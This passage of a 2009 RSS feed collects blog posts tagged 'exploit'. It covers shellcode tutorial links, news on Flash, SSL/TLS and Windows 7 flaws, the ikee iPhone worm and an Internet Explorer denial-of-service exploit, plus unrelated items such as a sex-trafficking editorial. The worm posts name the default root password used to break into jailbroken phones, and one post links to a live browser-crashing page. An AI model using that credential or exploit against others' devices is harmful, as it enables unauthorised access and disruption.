<a href="http://go.clb1.com/auea0qvlluk">Part 3</a> (Executing shellcode)<br />
<a href="http://go.clb1.com/awea0qvr6b2">Part 4</a> (Disassembling execve)<br />
<a href="http://go.clb1.com/apea0qvxs0c">Part 5</a> (shellcode for execve)<br />
<a href="http://go.clb1.com/area0qwfz5j">Part 6</a> (exploiting a program)<br />
<a href="http://go.clb1.com/afea0qw2qb5">Part 7</a> (exploiting a program: demonstration)<br />
<a href="http://go.clb1.com/alea0qw83ls">Part 8</a> (return to libc theory)<br />
<a href="http://go.clb1.com/awea0qwn13z">Part 9</a> (return to libc theory: demonstration)</p>
<p>I hope this has been helpful guys, don&#8217;t forget to follow me on <strong>twitter: </strong><a href="http://twitter.com/raykoid666"><strong>http://twitter.com/raykoid666</strong></a></p>
<p>-Raykoid666<!--more--><!--more--><!--more--><!--more--><!--more--></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slippery Flash Exploit Hits Gmail, YouTube, Flikr]]></title>
<link>http://komplettie.wordpress.com/2009/11/16/unpatchable-flash-exploit-emerges/</link>
<pubDate>Mon, 16 Nov 2009 10:55:31 +0000</pubDate>
<dc:creator>komplettie</dc:creator>
<guid>http://komplettie.wordpress.com/2009/11/16/unpatchable-flash-exploit-emerges/</guid>
<description><![CDATA[Word has emerged of a new vulnerability in Adobe’s Flash that seems as though it may well be entirel]]></description>
<content:encoded><![CDATA[Word has emerged of a new vulnerability in Adobe’s Flash that seems as though it may well be entirel]]></content:encoded>
</item>
<item>
<title><![CDATA[Capitalism and socialism]]></title>
<link>http://ictheworld.wordpress.com/2009/11/16/capitalism-and-socialism/</link>
<pubDate>Mon, 16 Nov 2009 08:43:30 +0000</pubDate>
<dc:creator>hotrao</dc:creator>
<guid>http://ictheworld.wordpress.com/2009/11/16/capitalism-and-socialism/</guid>
<description><![CDATA[Capitalism is the exploitation of one man by another; socialism is the reverse. Anonymous]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Capitalism is the exploitation of one man by another; socialism is the reverse.</p>
<p>Anonymous</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SSL and TLS Protocols Renegotiation Vulnerability]]></title>
<link>http://sdaguiar.wordpress.com/2009/11/15/ssl-and-tls-protocols-renegotiation-vulnerability/</link>
<pubDate>Sun, 15 Nov 2009 06:13:27 +0000</pubDate>
<dc:creator>Scott D. Aguiar</dc:creator>
<guid>http://sdaguiar.wordpress.com/2009/11/15/ssl-and-tls-protocols-renegotiation-vulnerability/</guid>
<description><![CDATA[On 11/05/09 the notice of Renegotiation vulnerabilities within SSL/TLS protocols became public.  The]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>On 11/05/09 the notice of Renegotiation vulnerabilities within SSL/TLS protocols became public.  The vulnerability allows for injection of arbitrary plain-text allowing for HTTP requests, or impersonate the victim, as well as other consequences.</p>
<p>~Opinion~</p>
<p>While the known possible outcomes of this vulnerability seem similar to many of the run-of-the-mill exploits we&#8217;ve seen, the ramifications behind this vulnerability are monumental.</p>
<p>Just the number of vendors, and their products effected by this alone show that there will soon be a revolution.  The affect on everyday lives of so many will undoubtedly negative.</p>
<p>Either a major overhaul of the protocols is necessary, or we are in for a new breed of security focus.  An overhaul is most likely to occur; however, if it doesn&#8217;t we will have to be prepared to move into a security stance which covers security in both a pre- and post- environment.</p>
<p>Our previously hardened infrastructure would have to be analyzed, and protected during use.  Protecting our protection if you will.</p>
<p>While all this seems goofy, given the fact that we will most likely just patch and move on, it seems to beckon the time for more intuitive security measures is nearing, or hear.  Security measures that&#8230; think.</p>
<p>Packets with guns.  Headers with secret handshakes. Connections that conspire against their own existence.</p>
<p>~/Opinion~</p>
<p>&#160;</p>
<p>As usual, if you want to hear more information, visit the link below&#8230; And I am very interested in hearing comments on this one&#8230; Maybe I am just blowing it out of proportion, but it seems big.</p>
<p><a class="aligncenter" title="SSL/TLS Renegotiation Vulnerability" href="http://www.kb.cert.org/vuls/id/120541" target="_blank">Vulnerability Note VU#120541 (New Window)</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 7 zero day exploit]]></title>
<link>http://mtaram.wordpress.com/2009/11/13/windows-7-zero-day-exploit/</link>
<pubDate>Fri, 13 Nov 2009 20:22:49 +0000</pubDate>
<dc:creator>MtaraM</dc:creator>
<guid>http://mtaram.wordpress.com/2009/11/13/windows-7-zero-day-exploit/</guid>
<description><![CDATA[A security researcher has said there is a zero-day vulnerability affecting Windows 7 and Vista. The ]]></description>
<content:encoded><![CDATA[A security researcher has said there is a zero-day vulnerability affecting Windows 7 and Vista. The ]]></content:encoded>
</item>
<item>
<title><![CDATA[With the power of 20 Kim Jong-Il's]]></title>
<link>http://engrishfunny.com/2009/11/13/engrish-power-exploiter/</link>
<pubDate>Fri, 13 Nov 2009 20:00:27 +0000</pubDate>
<dc:creator>Cheezburger Network</dc:creator>
<guid>http://engrishfunny.com/2009/11/13/engrish-power-exploiter/</guid>
<description><![CDATA[Super Power Exploiter Genesis Distiction Chariot Chariots Without Rival Submitted by: dunno source v]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p class="mine_asset assetid_2764315392">
<img src="http://engrishfunny.wordpress.com/files/2009/10/engrish-funny-power-exploiter.jpg" alt="engrish funny power exploiter" title="engrish-funny-power-exploiter" class="mine_2764315392" /></p>
<p>Super Power Exploiter<br />
Genesis Distiction Chariot<br />
Chariots Without Rival</p>
<p>Submitted by: dunno source via <a rel="nofollow" href="http://cheezburger.com/engrish">Engrish Funny Submissions</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Blaming the victim]]></title>
<link>http://cjaye57.wordpress.com/2009/11/11/blaming-the-victim/</link>
<pubDate>Wed, 11 Nov 2009 11:20:18 +0000</pubDate>
<dc:creator>cjaye57</dc:creator>
<guid>http://cjaye57.wordpress.com/2009/11/11/blaming-the-victim/</guid>
<description><![CDATA[Our view: Shoddy police work sank the pandering case against Carlos Silot, but even had he been conv]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><img src="http://cjaye57.wordpress.com/files/2009/11/thumbnail-aspx1.jpg" alt="thumbnail.aspx" title="thumbnail.aspx" width="160" height="160" class="aligncenter size-full wp-image-1872" /><br />
<strong>Our view: Shoddy police work sank the pandering case against Carlos Silot, but even had he been convicted, Maryland&#8217;s laws aren&#8217;t tough enough on adult sex traffickers</strong></p>
<p>The case against Carlos Silot, whom police last year accused of running a brothel near Patterson Park, seemed clear cut. Officers put his rented rowhouse under surveillance, then watched as more than a dozen men entered and left over a span of hours. When detectives searched the house they found lists of customers, condoms, photographs, money, business cards and two women from Mexico who said Mr. Silot brought them there to have sex with customers. They were arrested for prostitution, and Mr. Silot was charged with &#8220;pandering&#8221; &#8211; a misdemeanor offense.</p>
<p>Still, on paper, the case looked like a slam-dunk for the prosecution. Yet it fell apart this week, and for an all-too-predictable reason: The women refused to testify against him. In fact, they were nowhere to be found.</p>
<p>How could anyone have expected otherwise? The women were illegal immigrants who had been cut off from their families and made to endure countless deprivations. Last April, when their case first came to trial, their lawyer claimed they were tricked into coming here and that they were held as virtual captives in the Patterson Park house. They couldn&#8217;t possibly expect that testifying against the man they say was responsible would turn out well, especially after learning that the state&#8217;s case against Mr. Silot was already shaky because police had mishandled or lost key pieces of evidence against him.</p>
<p>What assurances could the Baltimore state&#8217;s attorney&#8217;s office have made that it would protect these women? It can&#8217;t have helped that prosecutors initially charged them with prostitution &#8211; even though they were the victims.</p>
<p>In recent years, federal prosecutors have had notable success prosecuting sex-traffickers who exploit women and girls through force, fraud or coercion. The U.S. attorney&#8217;s office can bring to bear more resources than local authorities to investigate alleged crimes. Federal laws for such crimes are much stricter, and the federal government can provide legal status for sex-trafficking victims and help them rebuild their lives.</p>
<p>But the feds can&#8217;t handle every sex-trafficking case that comes up, which is why local prosecutors took the lead on Mr. Silot&#8217;s case. And the outcome points up not only the police&#8217;s bungling of the evidence needed to secure a conviction but also the clumsy way officials responded to the victims of sex-trafficking, as well as the disparity in penalties for traffickers who exploit children versus those whose victims are adults.</p>
<p>Since 2007, child sex trafficking has been a felony punishable by up to 25 years in prison in Maryland. But state law still treats trafficking in adult women as a misdemeanor; even if Mr. Silot had been convicted of pandering, he would have served no more than 10 years. </p>
<p>Not every case of pandering involves force, fraud or coercion, but for those that do, the penalty for adult and child sex-trafficking shouldn&#8217;t be so disparate.</p>
<p>Moreover, police need better training to recognize the signs of sex-trafficking and to protect its victims rather than treat them as criminals. They should know when to call in specialized investigative units and how to put victims in touch with nonprofit groups that offer counseling and other services. It&#8217;s a lot easier to slap a prostitution charge on a frightened woman who may not speak English well or even know the name of the city where she has been brought than it is to put her pimp behind bars. But that&#8217;s too often the way sex-trafficking cases are treated, and it needs to change.</p>
<p>Readers respond<br />
The news that a credible sex trafficking case &#8220;fell apart&#8221; due to a lack of testimony from two victims is unsurprising at best. Both foreign national and U.S. citizen victims of sex and labor trafficking face enormous obstacles as they attempt to leave (or simply survive) unimaginable, often terrifying circumstances.</p>
<p>However, rather than cast blame on prosecutors, it is more productive to understand that in Maryland, local, state and federal law enforcement officers; advocates; and legislative experts have formed the Maryland Human Trafficking Task Force to assist victims and ensure justice, including successful prosecution. This body is able to serve victims and get the word out about the scourge of sex and labor trafficking in Maryland.</p>
<p>Let&#8217;s put aside our differences and focus on the real enemy &#8211; male and female traffickers, from this country and elsewhere, who ruthlessly exploit child, teen and adult victims &#8211; and on real solutions, which always involve working together as one.</p>
<p>source: http://www.baltimoresun.com/news/opinion/editorial/bal-ed.sextrafficking11nov11,0,4383283.story</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Jailbreakers: First iPhone Worm Discovered, Features Rick Astley]]></title>
<link>http://theappleblog.com/2009/11/09/jailbreakers-first-iphone-worm-discovered-features-rick-astley/</link>
<pubDate>Mon, 09 Nov 2009 19:16:09 +0000</pubDate>
<dc:creator>Darrell Etherington</dc:creator>
<guid>http://theappleblog.com/2009/11/09/jailbreakers-first-iphone-worm-discovered-features-rick-astley/</guid>
<description><![CDATA[The first iPhone worm has been discovered. It comes to us via Australia, and appears to be limited t]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p class="excerpt"><img class="alignright size-full wp-image-35506" title="ikee-170" src="http://gigapple.wordpress.com/files/2009/11/ikee-170.jpg" alt="ikee-170" width="170" height="194" />The first iPhone worm has been discovered. It comes to us via Australia, and appears to be limited to that country for now, although it has the potential to spread. It also stars Rick Astley, so to speak. The work changes the iPhone&#8217;s wallpaper to an image of the 1980s pop singer, who&#8217;s enjoyed a recent resurgence thanks to the <a href="http://newteevee.com/2008/04/01/rickrolling-a-timeline/">Rick-rolling Internet phenomenon</a>.</p>
<p>The worm has the ability to break into jailbroken iPhones only. Even if you&#8217;ve jailbroken, you still aren&#8217;t vulnerable unless you&#8217;ve also installed SSH, and not changed the default password after doing so. As a result, only a small fraction of the larger iPhone community is probably susceptible to the &#8220;ikee virus,&#8221; as it is called in its own source code. <!--more--></p>
<p>Still, it shows that as the platform matures and becomes more widespread, it also becomes the target of more malicious attacks. Most hackers, like any businesspeople, are interested in the bottom line, and part of that involves targeting the largest group of people possible. With millions of users worldwide, the iPhone is definitely an appealing mark. ikee&#8217;s creator, a hacker calling himself &#8220;ikex,&#8221; cites a different explanation for this particular worm&#8217;s creation:</p>
<blockquote><p>Why?: Boredom, because i found it so stupid the fact that on my initial scan of my 3G optus range i found 27 hosts running SSH daemons, i could access 26 of them with root:alpine. Doesn&#8217;t anyone RTFM anymore?</p></blockquote>
<p>In the case of this worm, which only changes the background wallpaper to the Astley photo with the slogan, &#8220;ikee is never going to give you up&#8221; across the top, <a href="http://www.sophos.com/blogs/gc/g/2009/11/08/iphone-worm-discovered-wallpaper-rick-astley-photo/" target="_self">Graham Cluley of SophosLabs</a> suggests it&#8217;s really only an experiment:</p>
<blockquote><p>The source code is littered with comments from the author suggesting the worm has been written as an experiment. One of the comments berates affected users for not following instructions when installing SSH, because if they had changed the default password the worm would not have been able to infect them.</p></blockquote>
<p>While not dangerous in and of itself (it actually sort of provides a service by reminding users to take precautions), it could open the door for similar programs with less innocuous payloads. Hopefully, jailbreak users will learn from the experience and be prepared if someone more sinister tries to do the same thing again.</p>
<p>It&#8217;ll be interesting to see whether Apple (s aapl) latches onto this as a means to further decry the evils of jailbreak. If it leads to more serious exploits, it definitely would constitute a good reason to stay on the straight and narrow. In either case, expect to see more security concerns surrounding the iPhone as it continues its commercial success.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerabilità DoS in IE]]></title>
<link>http://redskull92.wordpress.com/2009/11/09/vulnerabilita-dos-in-ie/</link>
<pubDate>Mon, 09 Nov 2009 17:31:25 +0000</pubDate>
<dc:creator>Red Skull</dc:creator>
<guid>http://redskull92.wordpress.com/2009/11/09/vulnerabilita-dos-in-ie/</guid>
<description><![CDATA[E&#8217; stata appena scoperta (ieri 08-11-09) una nuova vulnerabilità su Internet Explorer, il famo]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p style="text-align:center;"><img class="alignnone" title="http://www.tomshw.it/articles/20071207/ie_c.jpg" src="http://www.tomshw.it/articles/20071207/ie_c.jpg" alt="" width="256" height="256" /></p>
<p style="text-align:left;"><!--more-->E&#8217; stata appena scoperta (ieri 08-11-09) una nuova vulnerabilità su Internet Explorer, il famoso browser di casa Microsoft.</p>
<p style="text-align:left;">Si tratta di un Denial of Service.</p>
<p style="text-align:left;">Praticamente visitando una pagina appositamente modificata farebbe bloccare il browser rendendolo impossibile da chiudere se non da TaskManager.</p>
<p style="text-align:left;">L&#8217;autore <strong>MustLive</strong> ha già informato la Microsoft.</p>
<p style="text-align:left;">Le versioni di IE affette sono le seguenti:</p>
<p style="text-align:left;"><span style="text-decoration:underline;"><strong>Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) and previous versions (and possible next versions too).</strong></span></p>
<p style="text-align:left;">Se volete vedere gli effetti dell&#8217;exploit andate <a href="http://websecurity.com.ua/uploads/2009/IE%20DoS%20Exploit10.html" target="_blank">quì</a> (non è pericoloso per la sicurezza, il browser si bloccherà solamente e dovrà essere terminato).</p>
<p style="text-align:left;">Saluti.</p>
<p style="text-align:left;"><!--more-->Torna alla <a href="http://redskull92.wordpress.com" target="_self">HomePage</a></p>
<p style="text-align:left;">
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[First iPhone Worm Targets Jailbroken iPhones [WARNING]]]></title>
<link>http://encourager.wordpress.com/2009/11/09/first-iphone-worm-targets-jailbroken-iphones-warning/</link>
<pubDate>Mon, 09 Nov 2009 13:27:54 +0000</pubDate>
<dc:creator>encourager</dc:creator>
<guid>http://encourager.wordpress.com/2009/11/09/first-iphone-worm-targets-jailbroken-iphones-warning/</guid>
<description><![CDATA[November 8th, 2009 | by Pete Cashmore If you’ve got a jailbroken iPhone, listen up: a worm is report]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>November 8th, 2009 &#124; by Pete Cashmore</p>
<p>If you’ve got a jailbroken iPhone, listen up: a worm is reported to have broken out in Australia that targets owners who have not changed the default password after installing SSH.</p>
<p>The worm’s behavior is somewhat amusing: it changes your background to a photo of Rick Astley, then looks for other phones on the network to infect. That said, the exploit could easily be used by hackers with malicious intent for more nefarious purposes.</p>
<p>If you have a jailbroken iPhone and you’ve installed SSH without changing the default password (from “alpine”) you need to do so to avoid such attacks. If you have not jailbroken your iPhone or iPod Touch and installed SSH, you are not affected.</p>
<p>Sophos writes of the exploit:</p>
<p>SophosLabs is analysing the worm’s code, which suggests that at least four variants have been written so far. One of the attributes of the latest variant (labelled the “D” version) is that it tries to hide its presence by using a filepath suggestive of the Cydia application.</p>
<p>The source code is littered with comments from the author suggesting the worm has been written as an experiment. One of the comments berates affected users for not following instructions when installing SSH, because if they had changed the default password the worm would not have been able to infect them.</p>
<p>You have been warned!<br />
via mashable.com</p>


<!-- No posting client link spam, please. -->


</div>]]></content:encoded>
</item>

</channel>
</rss>
